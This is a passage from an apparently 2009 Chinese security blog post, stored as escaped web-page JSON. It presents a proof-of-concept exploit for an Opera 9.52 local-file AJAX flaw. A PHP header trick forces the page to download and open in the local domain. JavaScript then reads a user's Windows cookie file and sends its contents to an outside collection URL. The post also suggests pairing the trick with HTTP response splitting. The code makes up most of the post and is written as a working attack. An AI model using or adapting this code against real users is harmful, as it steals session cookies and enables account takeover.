\n\u4e2d\uff0c\u63d0\u5230\u4e86opera\u7684ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6f0f\u6d1e\u3002<\/p>\n
\u4f46\u662f\u5229\u7528\u65b9\u5f0f\u4e0a\uff0c\u6bd4\u8f83\u72ed\u9698\u3002<\/p>\n
\u5f88\u5c11\u4eba\u4f1a\u4e13\u95e8\u4e0b\u8f7dhtm\u6587\u4ef6\u5230\u672c\u5730\uff0c\u7136\u540e\u6253\u5f00\u3002<\/p>\n
\u4f46\u662f\u52a8\u6001\u8bed\u8a00\uff08php\uff0casp\u7b49\uff09\u53ea\u8981\u4fee\u6539header\uff0c\u5c31\u53ef\u4ee5\u6307\u5b9a\u8ba9\u7528\u6237\u4e0b\u8f7d\u3002<\/p>\n
\u6211\u4eec\u8bbe\u8ba1\u5982\u4e0b\u4ee3\u7801\u7684php\u6587\u4ef6\uff1a<\/p>\n
- \n
- <? <\/span><\/span><\/li>\n
- \/*<\/span> <\/span><\/li>\n
- opera 9.52 use ajax read <\/span><\/span>local txt file and upload exp
\n <\/span><\/span><\/li>\n- inbreak.net<\/span> <\/span><\/li>\n
- author kxlzx@xiaotou.org 2009-1-6 <\/span>
\n <\/span><\/li>\n- *\/<\/span> <\/span><\/span><\/li>\n
- header("Content-Disposition: attachment;filename=kxlzx.htm"<\/span>); <\/span><\/span><\/li>\n
- header("Content-type: application\/kxlzx"<\/span>); <\/span><\/span><\/li>\n
- ?> <\/span><\/li>\n
- <iframe id="framekxlzx"<\/span> width=0 height=0><\/iframe> <\/span><\/span><\/li>\n
- <script> <\/span><\/li>\n
- var<\/span> xmlHttp; <\/span><\/span><\/li>\n
- function<\/span> createXMLHttp(){ <\/span><\/span><\/li>\n
- if<\/span>(window.XMLHttpRequest){ <\/span><\/span><\/li>\n
- xmlHttp = new<\/span> XMLHttpRequest(); <\/span><\/span><\/li>\n
- } <\/span><\/li>\n
- else<\/span> <\/span>if<\/span>(window.ActiveXObject){ <\/span><\/span><\/li>\n
- xmlHttp = new<\/span> ActiveXObject(<\/span>"Microsoft.XMLHTTP"<\/span>); <\/span><\/span><\/li>\n
- } <\/span><\/li>\n
- } <\/span><\/li>\n
- <\/span><\/li>\n
- function<\/span> startRequest(doUrl){ <\/span><\/span><\/li>\n
- <\/span><\/li>\n
- createXMLHttp(); <\/span><\/li>\n
- <\/span><\/li>\n
- xmlHttp.onreadystatechange = handleStateChange; <\/span><\/li>\n
- <\/span><\/li>\n
- xmlHttp.open("GET"<\/span>, doUrl, true); <\/span><\/span><\/li>\n
- <\/span><\/li>\n
- xmlHttp.send(null); <\/span><\/li>\n
- <\/span><\/li>\n
- <\/span><\/li>\n
- } <\/span><\/li>\n
- <\/span><\/li>\n
- function<\/span> handleStateChange(){ <\/span><\/span><\/li>\n
- if<\/span> (xmlHttp.readyState == 4 ){ <\/span><\/span><\/li>\n
- var<\/span> strResponse = <\/span>""<\/span>; <\/span><\/span><\/li>\n
- setTimeout("framekxlzxPost(xmlHttp.responseText)"<\/span>, 1000); <\/span><\/span><\/li>\n
- <\/span><\/li>\n
- } <\/span><\/li>\n
- } <\/span><\/li>\n
- <\/span><\/li>\n
- function<\/span> doMyAjax(user,file) <\/span><\/span><\/li>\n
- { <\/span><\/li>\n
- var<\/span> time = Math.random(); <\/span><\/span><\/li>\n
- <\/span><\/li>\n
- var<\/span> strPer = <\/span>‘file:\/\/localhost\/C:\/Documents%20and%20Settings\/’<\/span>+user+<\/span>‘\/Cookies\/’<\/span>+file+<\/span>‘?time=’<\/span>+time; <\/span><\/span><\/li>\n
- <\/span><\/li>\n
- startRequest(strPer); <\/span><\/li>\n
- <\/span><\/li>\n
- } <\/span><\/li>\n
- <\/span><\/li>\n
- function<\/span> framekxlzxPost(text) <\/span><\/span><\/li>\n
- { <\/span><\/li>\n
- document.getElementById(‘framekxlzx’<\/span>).src=<\/span>"http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php?cookie="<\/span>+escape(text); <\/span><\/span><\/li>\n
- alert(\/ok\/); <\/span><\/li>\n
- } <\/span><\/li>\n
- <\/span><\/li>\n
- doMyAjax(‘administrator’<\/span>,<\/span>‘administrator@alibaba[1].txt’<\/span>); <\/span><\/span><\/li>\n
- <\/span><\/li>\n
- <\/script> <\/span><\/li>\n<\/ol>\n<\/div>\n
\u5176\u4ed6\u4ee3\u7801\u548c\u524d\u6587\u4e00\u81f4\uff0c\u4f46\u662f\u591a\u51fa\u4e86<\/p>\n
- \n
- header("Content-Disposition: attachment;filename=kxlzx.htm"<\/span>); <\/span><\/font><\/span><\/li>\n
- header("Content-type: application\/kxlzx"<\/font><\/span>);
\n <\/span><\/span><\/li>\n<\/ol>\n\u8fd9\u6bb5\u3002<\/p>\n
\u7b2c\u4e00\u884c\u5b9a\u4e49http\u5934\uff0c\u4e0b\u8f7d\u6587\u4ef6\u7684\u6587\u4ef6\u540d\u9ed8\u8ba4\u4e3akxlzx.htm\u3002
\n\u56e0\u4e3a\u5982\u679c\u4f60\u4e0b\u8f7d\u4e86\u5176\u4ed6\u7c7b\u578b\u7684\u6587\u4ef6\uff0cwindows\u4f1a\u9ed8\u8ba4\u8ba9\u5176\u4ed6\u7c7b\u578b\u7684\u6587\u4ef6\u7a0b\u5e8f\u6253\u5f00\u3002<\/p>\n\u4f46\u662f\u5b9a\u4e49\u4e86htm\u6587\u4ef6\u540d\u540e\uff0cwindows\u5c31\u4f1a\u8ba9opera\u6253\u5f00\u8fd9\u4e2a\u6587\u4ef6\u3002
\n\u6ce8\u610f\uff0c\u8fd9\u91cc\u5df2\u7ecf\u4e0b\u8f7d\u4e86\u6587\u4ef6\uff0c\u6240\u4ee5\u57df\u5c5e\u4e8e\u672c\u5730\u57df\u3002<\/p>\n\u7b2c\u4e8c\u884c\u5b9a\u4e49\u4e86mm\u6587\u4ef6\u5934\uff08\u5443\u3002\u3002\u3002\uff09\uff0c\u968f\u4fbf\u5199\u4e86\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\uff0copera\u5c31\u4f1a\u81ea\u52a8\u4e0b\u8f7d\u8be5\u6587\u4ef6\u4e86\u3002<\/p>\n
\u4f7f\u7528opera\u6253\u5f00\u6d4b\u8bd5\u5730\u5740\uff1a<\/p>\n
http:\/\/inbreak.net\/kxlzxtest\/testxss\/b.php<\/a><\/p>\n
\u6253\u5f00\u540e\uff0c\u6548\u679c\u5982\u56fe
\n![\"1.jpg\"](\"\/wp-content\/uploads\/date_200901\/059208629e938278e9f05988b434483a.jpg\")
<\/a><\/p>\n\u6211\u60f3\uff0c\u770b\u5230\u8fd9\u4e2a\u6846\uff0c\u7528\u6237\u4e0d\u7ba1\u662f\u70b9\u4e86\u6253\u5f00\u8fd8\u662f\u70b9\u4e86\u4fdd\u5b58<\/strong>\uff0c\u6700\u7ec8\u6253\u5f00\u7684\u65f6\u5019\uff0c\u90fd\u662f\u4f7f\u7528opera\u5728\u672c\u5730\u57df\u4e0b\u6253\u5f00\u7684\u3002<\/p>\n
\u6bd4\u8f83\u7325\u7410\u7684\u5229\u7528\u65b9\u6cd5\u3002<\/p>\n
\u66f4\u7325\u7410\u7684\u65b9\u5f0f\uff0c\u5927\u5bb6\u53ef\u4ee5\u7ed3\u5408HTTP Response Splitting \u653b\u51fb<\/strong> \uff0c\u5728http\u5934\u52a0\u4e0a\u4ee5\u4e0a\u4e24\u6bb5\u5185\u5bb9\uff0c\u5229\u7528\u8303\u56f4\u66f4\u5e7f\u3002<\/p>\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
- header("Content-type: application\/kxlzx"<\/font><\/span>);
- \/*<\/span> <\/span><\/li>\n